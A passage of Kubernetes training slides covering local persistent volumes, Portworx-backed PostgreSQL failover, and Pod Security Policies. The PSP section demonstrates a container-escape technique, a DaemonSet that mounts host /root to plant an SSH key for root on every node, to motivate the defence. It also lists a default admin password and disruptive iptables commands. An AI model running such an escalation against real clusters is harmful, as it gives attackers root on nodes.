.debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Deploying Consul - We will use a slightly different YAML file - The only differences between that file and the previous one are: - `volumeClaimTemplate` defined in the Stateful Set spec - the corresponding `volumeMounts` in the Pod spec - the label `consul` has been changed to `persistentconsul`
(to avoid conflicts with the other Stateful Set) .exercise[ - Apply the persistent Consul YAML file: ```bash kubectl apply -f ~/container.training/k8s/persistent-consul.yaml ``` ] .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Observing the situation - Let's look at Persistent Volume Claims and Pods .exercise[ - Check that we now have an unbound Persistent Volume Claim: ```bash kubectl get pvc ``` - We don't have any Persistent Volume: ```bash kubectl get pv ``` - The Pod `persistentconsul-0` is not scheduled yet: ```bash kubectl get pods -o wide ``` ] *Hint: leave these commands running with `-w` in different windows.* .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Explanations - In a Stateful Set, the Pods are started one by one - `persistentconsul-1` won't be created until `persistentconsul-0` is running - `persistentconsul-0` has a dependency on an unbound Persistent Volume Claim - The scheduler won't schedule the Pod until the PVC is bound (because the PVC might be bound to a volume that is only available on a subset of nodes; for instance EBS are tied to an availability zone) .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Creating Persistent Volumes - Let's create 3 local directories (`/mnt/consul`) on node2, node3, node4 - Then create 3 Persistent Volumes corresponding to these directories .exercise[ - Create the local directories: ```bash for NODE in node2 node3 node4; do ssh $NODE sudo mkdir -p /mnt/consul done ``` - Create the PV objects: ```bash kubectl apply -f ~/container.training/k8s/volumes-for-consul.yaml ``` ] .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Check our Consul cluster - The PVs that we created will be automatically matched with the PVCs - Once a PVC is bound, its pod can start normally - Once the pod `persistentconsul-0` has started, `persistentconsul-1` can be created, etc. - Eventually, our Consul cluster is up, and backend by "persistent" volumes .exercise[ - Check that our Consul clusters has 3 members indeed: ```bash kubectl exec persistentconsul-0 consul members ``` ] .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Devil is in the details (1/2) - The size of the Persistent Volumes is bogus (it is used when matching PVs and PVCs together, but there is no actual quota or limit) .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Devil is in the details (2/2) - This specific example worked because we had exactly 1 free PV per node: - if we had created multiple PVs per node ... - we could have ended with two PVCs bound to PVs on the same node ... - which would have required two pods to be on the same node ... - which is forbidden by the anti-affinity constraints in the StatefulSet - To avoid that, we need to associated the PVs with a Storage Class that has: ```yaml volumeBindingMode: WaitForFirstConsumer ``` (this means that a PVC will be bound to a PV only after being used by a Pod) - See [this blog post](https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/) for more details .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Bulk provisioning - It's not practical to manually create directories and PVs for each app - We *could* pre-provision a number of PVs across our fleet - We could even automate that with a Daemon Set: - creating a number of directories on each node - creating the corresponding PV objects - We also need to recycle volumes - ... This can quickly get out of hand .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Dynamic provisioning - We could also write our own provisioner, which would: - watch the PVCs across all namespaces - when a PVC is created, create a corresponding PV on a node - Or we could use one of the dynamic provisioners for local persistent volumes (for instance the [Rancher local path provisioner](https://github.com/rancher/local-path-provisioner)) .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- ## Strategies for local persistent volumes - Remember, when a node goes down, the volumes on that node become unavailable - High availability will require another layer of replication (like what we've just seen with Consul; or primary/secondary; etc) - Pre-provisioning PVs makes sense for machines with local storage (e.g. cloud instance storage; or storage directly attached to a physical machine) - Dynamic provisioning makes sense for large number of applications (when we can't or won't dedicate a whole disk to a volume) - It's possible to mix both (using distinct Storage Classes) ??? :EN:- Static vs dynamic volume provisioning :EN:- Example: local persistent volume provisioner :FR:- Création statique ou dynamique de volumes :FR:- Exemple : création de volumes locaux .debug[[k8s/local-persistent-volumes.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/local-persistent-volumes.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/aerial-view-of-containers.jpg)] --- name: toc-highly-available-persistent-volumes class: title Highly available Persistent Volumes .nav[ [Previous section](#toc-local-persistent-volumes) | [Back to table of contents](#toc-module-4) | [Next section](#toc-bonus-material) ] .debug[(automatically generated title slide)] --- # Highly available Persistent Volumes - How can we achieve true durability? - How can we store data that would survive the loss of a node? -- - We need to use Persistent Volumes backed by highly available storage systems - There are many ways to achieve that: - leveraging our cloud's storage APIs - using NAS/SAN systems or file servers - distributed storage systems -- - We are going to see one distributed storage system in action .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Our test scenario - We will set up a distributed storage system on our cluster - We will use it to deploy a SQL database (PostgreSQL) - We will insert some test data in the database - We will disrupt the node running the database - We will see how it recovers .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Portworx - Portworx is a *commercial* persistent storage solution for containers - It works with Kubernetes, but also Mesos, Swarm ... - It provides [hyper-converged](https://en.wikipedia.org/wiki/Hyper-converged_infrastructure) storage (=storage is provided by regular compute nodes) - We're going to use it here because it can be deployed on any Kubernetes cluster (it doesn't require any particular infrastructure) - We don't endorse or support Portworx in any particular way (but we appreciate that it's super easy to install!) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## A useful reminder - We're installing Portworx because we need a storage system - If you are using AKS, EKS, GKE ... you already have a storage system (but you might want another one, e.g. to leverage local storage) - If you have setup Kubernetes yourself, there are other solutions available too - on premises, you can use a good old SAN/NAS - on a private cloud like OpenStack, you can use e.g. Cinder - everywhere, you can use other systems, e.g. Gluster, StorageOS .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Installing Portworx - Portworx installation is relatively simple - ... But we made it *even simpler!* - We are going to use a YAML manifest that will take care of everything - Warning: this manifest is customized for a very specific setup (like the VMs that we provide during workshops and training sessions) - It will probably *not work* If you are using a different setup (like Docker Desktop, k3s, MicroK8S, Minikube ...) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## The simplified Portworx installer - The Portworx installation will take a few minutes - Let's start it, then we'll explain what happens behind the scenes .exercise[ - Install Portworx: ```bash kubectl apply -f ~/container.training/k8s/portworx.yaml ``` ] *Note: this was tested with Kubernetes 1.18. Newer versions may or may not work.* .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## What's in this YAML manifest? - Portworx installation itself, pre-configured for our setup - A default *Storage Class* using Portworx - A *Daemon Set* to create loop devices on each node of the cluster .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Portworx installation - The official way to install Portworx is to use [PX-Central](https://central.portworx.com/) (this requires a free account) - PX-Central will ask us a few questions about our cluster (Kubernetes version, on-prem/cloud deployment, etc.) - Using our answers, it will generate a YAML manifest that we can use .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Portworx storage configuration - Portworx needs at least one *block device* - Block device = disk or partition on a disk - We can see block devices with `lsblk` (or `cat /proc/partitions` if we're old school like that!) - If we don't have a spare disk or partition, we can use a *loop device* - A loop device is a block device actually backed by a file - These are frequently used to mount ISO (CD/DVD) images or VM disk images .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Setting up a loop device - Our `portworx.yaml` manifest includes a *Daemon Set* that will: - create a 10 GB (empty) file on each node - load the `loop` module (if it's not already loaded) - associate a loop device with the 10 GB file - After these steps, we have a block device that Portworx can use .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Implementation details - The file is `/portworx.blk` (it is a [sparse file](https://en.wikipedia.org/wiki/Sparse_file) created with `truncate`) - The loop device is `/dev/loop4` - This can be verified by running `sudo losetup` - The *Daemon Set* uses a privileged *Init Container* - We can check the logs of that container with: ```bash kubectl logs --selector=app=setup-loop4-for-portworx \ -c setup-loop4-for-portworx ``` .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Waiting for Portworx to be ready - The installation process will take a few minutes .exercise[ - Check out the logs: ```bash stern -n kube-system portworx ``` - Wait until it gets quiet (you should see `portworx service is healthy`, too) ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Dynamic provisioning of persistent volumes - We are going to run PostgreSQL in a Stateful set - The Stateful set will specify a `volumeClaimTemplate` - That `volumeClaimTemplate` will create Persistent Volume Claims - Kubernetes' [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/) will satisfy these Persistent Volume Claims (by creating Persistent Volumes and binding them to the claims) - The Persistent Volumes are then available for the PostgreSQL pods .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Storage Classes - It's possible that multiple storage systems are available - Or, that a storage system offers multiple tiers of storage (SSD vs. magnetic; mirrored or not; etc.) - We need to tell Kubernetes *which* system and tier to use - This is achieved by creating a Storage Class - A `volumeClaimTemplate` can indicate which Storage Class to use - It is also possible to mark a Storage Class as "default" (it will be used if a `volumeClaimTemplate` doesn't specify one) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Check our default Storage Class - The YAML manifest applied earlier should define a default storage class .exercise[ - Check that we have a default storage class: ```bash kubectl get storageclass ``` ] There should be a storage class showing as `portworx-replicated (default)`. .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Our default Storage Class This is our Storage Class (in `k8s/storage-class.yaml`): ```yaml kind: StorageClass apiVersion: storage.k8s.io/v1beta1 metadata: name: portworx-replicated annotations: storageclass.kubernetes.io/is-default-class: "true" provisioner: kubernetes.io/portworx-volume parameters: repl: "2" priority_io: "high" ``` - It says "use Portworx to create volumes and keep 2 replicas of these volumes" - The annotation makes this Storage Class the default one .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Our Postgres Stateful set - The next slide shows `k8s/postgres.yaml` - It defines a Stateful set - With a `volumeClaimTemplate` requesting a 1 GB volume - That volume will be mounted to `/var/lib/postgresql/data` - There is another little detail: we enable the `stork` scheduler - The `stork` scheduler is optional (it's specific to Portworx) - It helps the Kubernetes scheduler to colocate the pod with its volume (see [this blog post](https://portworx.com/stork-storage-orchestration-kubernetes/) for more details about that) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- .small[ ```yaml apiVersion: apps/v1 kind: StatefulSet metadata: name: postgres spec: selector: matchLabels: app: postgres serviceName: postgres template: metadata: labels: app: postgres spec: schedulerName: stork containers: - name: postgres image: postgres:12 env: - name: POSTGRES_HOST_AUTH_METHOD value: trust volumeMounts: - mountPath: /var/lib/postgresql/data name: postgres volumeClaimTemplates: - metadata: name: postgres spec: accessModes: ["ReadWriteOnce"] resources: requests: storage: 1Gi ``` ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Creating the Stateful set - Before applying the YAML, watch what's going on with `kubectl get events -w` .exercise[ - Apply that YAML: ```bash kubectl apply -f ~/container.training/k8s/postgres.yaml ``` ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Testing our PostgreSQL pod - We will use `kubectl exec` to get a shell in the pod - Good to know: we need to use the `postgres` user in the pod .exercise[ - Get a shell in the pod, as the `postgres` user: ```bash kubectl exec -ti postgres-0 su postgres ``` - Check that default databases have been created correctly: ```bash psql -l ``` ] (This should show us 3 lines: postgres, template0, and template1.) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Inserting data in PostgreSQL - We will create a database and populate it with `pgbench` .exercise[ - Create a database named `demo`: ```bash createdb demo ``` - Populate it with `pgbench`: ```bash pgbench -i demo ``` ] - The `-i` flag means "create tables" - If you want more data in the test tables, add e.g. `-s 10` (to get 10x more rows) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Checking how much data we have now - The `pgbench` tool inserts rows in table `pgbench_accounts` .exercise[ - Check that the `demo` base exists: ```bash psql -l ``` - Check how many rows we have in `pgbench_accounts`: ```bash psql demo -c "select count(*) from pgbench_accounts" ``` - Check that `pgbench_history` is currently empty: ```bash psql demo -c "select count(*) from pgbench_history" ``` ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Testing the load generator - Let's use `pgbench` to generate a few transactions .exercise[ - Run `pgbench` for 10 seconds, reporting progress every second: ```bash pgbench -P 1 -T 10 demo ``` - Check the size of the history table now: ```bash psql demo -c "select count(*) from pgbench_history" ``` ] Note: on small cloud instances, a typical speed is about 100 transactions/second. .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Generating transactions - Now let's use `pgbench` to generate more transactions - While it's running, we will disrupt the database server .exercise[ - Run `pgbench` for 10 minutes, reporting progress every second: ```bash pgbench -P 1 -T 600 demo ``` - You can use a longer time period if you need more time to run the next steps ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Find out which node is hosting the database - We can find that information with `kubectl get pods -o wide` .exercise[ - Check the node running the database: ```bash kubectl get pod postgres-0 -o wide ``` ] We are going to disrupt that node. -- By "disrupt" we mean: "disconnect it from the network". .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Disconnect the node - We will use `iptables` to block all traffic exiting the node (except SSH traffic, so we can repair the node later if needed) .exercise[ - SSH to the node to disrupt: ```bash ssh `nodeX` ``` - Allow SSH traffic leaving the node, but block all other traffic: ```bash sudo iptables -I OUTPUT -p tcp --sport 22 -j ACCEPT sudo iptables -I OUTPUT 2 -j DROP ``` ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Check that the node is disconnected .exercise[ - Check that the node can't communicate with other nodes: ``` ping node1 ``` - Logout to go back on `node1` - Watch the events unfolding with `kubectl get events -w` and `kubectl get pods -w` ] - It will take some time for Kubernetes to mark the node as unhealthy - Then it will attempt to reschedule the pod to another node - In about a minute, our pod should be up and running again .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Check that our data is still available - We are going to reconnect to the (new) pod and check .exercise[ - Get a shell on the pod: ```bash kubectl exec -ti postgres-0 su postgres ``` - Check how many transactions are now in the `pgbench_history` table: ```bash psql demo -c "select count(*) from pgbench_history" ``` ] If the 10-second test that we ran earlier gave e.g. 80 transactions per second, and we failed the node after 30 seconds, we should have about 2400 row in that table. .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Double-check that the pod has really moved - Just to make sure the system is not bluffing! .exercise[ - Look at which node the pod is now running on ```bash kubectl get pod postgres-0 -o wide ``` ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Re-enable the node - Let's fix the node that we disconnected from the network .exercise[ - SSH to the node: ```bash ssh `nodeX` ``` - Remove the iptables rule blocking traffic: ```bash sudo iptables -D OUTPUT 2 ``` ] .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## A few words about this PostgreSQL setup - In a real deployment, you would want to set a password - This can be done by creating a `secret`: ``` kubectl create secret generic postgres \ --from-literal=password=$(base64 /dev/urandom | head -c16) ``` - And then passing that secret to the container: ```yaml env: - name: POSTGRES_PASSWORD valueFrom: secretKeyRef: name: postgres key: password ``` .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Troubleshooting Portworx - If we need to see what's going on with Portworx: ``` PXPOD=$(kubectl -n kube-system get pod -l name=portworx -o json | jq -r .items[0].metadata.name) kubectl -n kube-system exec $PXPOD -- /opt/pwx/bin/pxctl status ``` - We can also connect to Lighthouse (a web UI) - check the port with `kubectl -n kube-system get svc px-lighthouse` - connect to that port - the default login/password is `admin/Password1` - then specify `portworx-service` as the endpoint .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Removing Portworx - Portworx provides a storage driver - It needs to place itself "above" the Kubelet (it installs itself straight on the nodes) - To remove it, we need to do more than just deleting its Kubernetes resources - It is done by applying a special label: ``` kubectl label nodes --all px/enabled=remove --overwrite ``` - Then removing a bunch of local files: ``` sudo chattr -i /etc/pwx/.private.json sudo rm -rf /etc/pwx /opt/pwx ``` (on each node where Portworx was running) .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: extra-details ## Dynamic provisioning without a provider - What if we want to use Stateful sets without a storage provider? - We will have to create volumes manually (by creating Persistent Volume objects) - These volumes will be automatically bound with matching Persistent Volume Claims - We can use local volumes (essentially bind mounts of host directories) - Of course, these volumes won't be available in case of node failure - Check [this blog post](https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/) for more information and gotchas .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- ## Acknowledgements The Portworx installation tutorial, and the PostgreSQL example, were inspired by [Portworx examples on Katacoda](https://katacoda.com/portworx/scenarios/), in particular: - [installing Portworx on Kubernetes](https://www.katacoda.com/portworx/scenarios/deploy-px-k8s) (with adapatations to use a loop device and an embedded key/value store) - [persistent volumes on Kubernetes using Portworx](https://www.katacoda.com/portworx/scenarios/px-k8s-vol-basic) (with adapatations to specify a default Storage Class) - [HA PostgreSQL on Kubernetes with Portworx](https://www.katacoda.com/portworx/scenarios/px-k8s-postgres-all-in-one) (with adaptations to use a Stateful Set and simplify PostgreSQL's setup) ??? :EN:- Using highly available persistent volumes :EN:- Example: deploying a database that can withstand node outages :FR:- Utilisation de volumes à haute disponibilité :FR:- Exemple : déployer une base de données survivant à la défaillance d'un nœud .debug[[k8s/portworx.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/portworx.md)] --- class: title, self-paced Thank you! .debug[[shared/thankyou.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/thankyou.md)] --- class: title, in-person That's all, folks!
Questions? ![end](images/end.jpg) .debug[[shared/thankyou.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/shared/thankyou.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/blue-containers.jpg)] --- name: toc-bonus-material class: title (Bonus material) .nav[ [Previous section](#toc-highly-available-persistent-volumes) | [Back to table of contents](#toc-module-5) | [Next section](#toc-pod-security-policies) ] .debug[(automatically generated title slide)] --- # (Bonus material) .debug[[4.yml](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/4.yml)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/chinook-helicopter-container.jpg)] --- name: toc-pod-security-policies class: title Pod Security Policies .nav[ [Previous section](#toc-bonus-material) | [Back to table of contents](#toc-module-5) | [Next section](#toc-designing-an-operator) ] .debug[(automatically generated title slide)] --- # Pod Security Policies - By default, our pods and containers can do *everything* (including taking over the entire cluster) - We are going to show an example of a malicious pod - Then we will explain how to avoid this with PodSecurityPolicies - We will enable PodSecurityPolicies on our cluster - We will create a couple of policies (restricted and permissive) - Finally we will see how to use them to improve security on our cluster .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Setting up a namespace - For simplicity, let's work in a separate namespace - Let's create a new namespace called "green" .exercise[ - Create the "green" namespace: ```bash kubectl create namespace green ``` - Change to that namespace: ```bash kns green ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Creating a basic Deployment - Just to check that everything works correctly, deploy NGINX .exercise[ - Create a Deployment using the official NGINX image: ```bash kubectl create deployment web --image=nginx ``` - Confirm that the Deployment, ReplicaSet, and Pod exist, and that the Pod is running: ```bash kubectl get all ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## One example of malicious pods - We will now show an escalation technique in action - We will deploy a DaemonSet that adds our SSH key to the root account (on *each* node of the cluster) - The Pods of the DaemonSet will do so by mounting `/root` from the host .exercise[ - Check the file `k8s/hacktheplanet.yaml` with a text editor: ```bash vim ~/container.training/k8s/hacktheplanet.yaml ``` - If you would like, change the SSH key (by changing the GitHub user name) ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Deploying the malicious pods - Let's deploy our "exploit"! .exercise[ - Create the DaemonSet: ```bash kubectl create -f ~/container.training/k8s/hacktheplanet.yaml ``` - Check that the pods are running: ```bash kubectl get pods ``` - Confirm that the SSH key was added to the node's root account: ```bash sudo cat /root/.ssh/authorized_keys ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Cleaning up - Before setting up our PodSecurityPolicies, clean up that namespace .exercise[ - Remove the DaemonSet: ```bash kubectl delete daemonset hacktheplanet ``` - Remove the Deployment: ```bash kubectl delete deployment web ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Pod Security Policies in theory - To use PSPs, we need to activate their specific *admission controller* - That admission controller will intercept each pod creation attempt - It will look at: - *who/what* is creating the pod - which PodSecurityPolicies they can use - which PodSecurityPolicies can be used by the Pod's ServiceAccount - Then it will compare the Pod with each PodSecurityPolicy one by one - If a PodSecurityPolicy accepts all the parameters of the Pod, it is created - Otherwise, the Pod creation is denied and it won't even show up in `kubectl get pods` .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Pod Security Policies fine print - With RBAC, using a PSP corresponds to the verb `use` on the PSP (that makes sense, right?) - If no PSP is defined, no Pod can be created (even by cluster admins) - Pods that are already running are *not* affected - If we create a Pod directly, it can use a PSP to which *we* have access - If the Pod is created by e.g. a ReplicaSet or DaemonSet, it's different: - the ReplicaSet / DaemonSet controllers don't have access to *our* policies - therefore, we need to give access to the PSP to the Pod's ServiceAccount .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Pod Security Policies in practice - We are going to enable the PodSecurityPolicy admission controller - At that point, we won't be able to create any more pods (!) - Then we will create a couple of PodSecurityPolicies - ...And associated ClusterRoles (giving `use` access to the policies) - Then we will create RoleBindings to grant these roles to ServiceAccounts - We will verify that we can't run our "exploit" anymore .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Enabling Pod Security Policies - To enable Pod Security Policies, we need to enable their *admission plugin* - This is done by adding a flag to the API server - On clusters deployed with `kubeadm`, the control plane runs in static pods - These pods are defined in YAML files located in `/etc/kubernetes/manifests` - Kubelet watches this directory - Each time a file is added/removed there, kubelet creates/deletes the corresponding pod - Updating a file causes the pod to be deleted and recreated .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Updating the API server flags - Let's edit the manifest for the API server pod .exercise[ - Have a look at the static pods: ```bash ls -l /etc/kubernetes/manifests ``` - Edit the one corresponding to the API server: ```bash sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Adding the PSP admission plugin - There should already be a line with `--enable-admission-plugins=...` - Let's add `PodSecurityPolicy` on that line .exercise[ - Locate the line with `--enable-admission-plugins=` - Add `PodSecurityPolicy` It should read: `--enable-admission-plugins=NodeRestriction,PodSecurityPolicy` - Save, quit ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Waiting for the API server to restart - The kubelet detects that the file was modified - It kills the API server pod, and starts a new one - During that time, the API server is unavailable .exercise[ - Wait until the API server is available again ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Check that the admission plugin is active - Normally, we can't create any Pod at this point .exercise[ - Try to create a Pod directly: ```bash kubectl run testpsp1 --image=nginx --restart=Never ``` - Try to create a Deployment: ```bash kubectl create deployment testpsp2 --image=nginx ``` - Look at existing resources: ```bash kubectl get all ``` ] We can get hints at what's happening by looking at the ReplicaSet and Events. .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Introducing our Pod Security Policies - We will create two policies: - privileged (allows everything) - restricted (blocks some unsafe mechanisms) - For each policy, we also need an associated ClusterRole granting *use* .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Creating our Pod Security Policies - We have a couple of files, each defining a PSP and associated ClusterRole: - k8s/psp-privileged.yaml: policy `privileged`, role `psp:privileged` - k8s/psp-restricted.yaml: policy `restricted`, role `psp:restricted` .exercise[ - Create both policies and their associated ClusterRoles: ```bash kubectl create -f ~/container.training/k8s/psp-restricted.yaml kubectl create -f ~/container.training/k8s/psp-privileged.yaml ``` ] - The privileged policy comes from [the Kubernetes documentation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#example-policies) - The restricted policy is inspired by that same documentation page .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Check that we can create Pods again - We haven't bound the policy to any user yet - But `cluster-admin` can implicitly `use` all policies .exercise[ - Check that we can now create a Pod directly: ```bash kubectl run testpsp3 --image=nginx --restart=Never ``` - Create a Deployment as well: ```bash kubectl create deployment testpsp4 --image=nginx ``` - Confirm that the Deployment is *not* creating any Pods: ```bash kubectl get all ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## What's going on? - We can create Pods directly (thanks to our root-like permissions) - The Pods corresponding to a Deployment are created by the ReplicaSet controller - The ReplicaSet controller does *not* have root-like permissions - We need to either: - grant permissions to the ReplicaSet controller *or* - grant permissions to our Pods' ServiceAccount - The first option would allow *anyone* to create pods - The second option will allow us to scope the permissions better .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Binding the restricted policy - Let's bind the role `psp:restricted` to ServiceAccount `green:default` (aka the default ServiceAccount in the green Namespace) - This will allow Pod creation in the green Namespace (because these Pods will be using that ServiceAccount automatically) .exercise[ - Create the following RoleBinding: ```bash kubectl create rolebinding psp:restricted \ --clusterrole=psp:restricted \ --serviceaccount=green:default ``` ] .debug[[k8s/podsecuritypolicy.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/podsecuritypolicy.md)] --- ## Trying it out - The Deployments that we created earlier will *eventually* recover (the ReplicaSet controller will retry to create Pods once in a while) - If we create a new Deployment now, it should work immediately .exercise[ - Create a simple Deployment: ```bash kubectl create deployment testpsp5 --image=nginx ``` - Look at the Pods that have been created: ```bash kubectl get all ``` ] 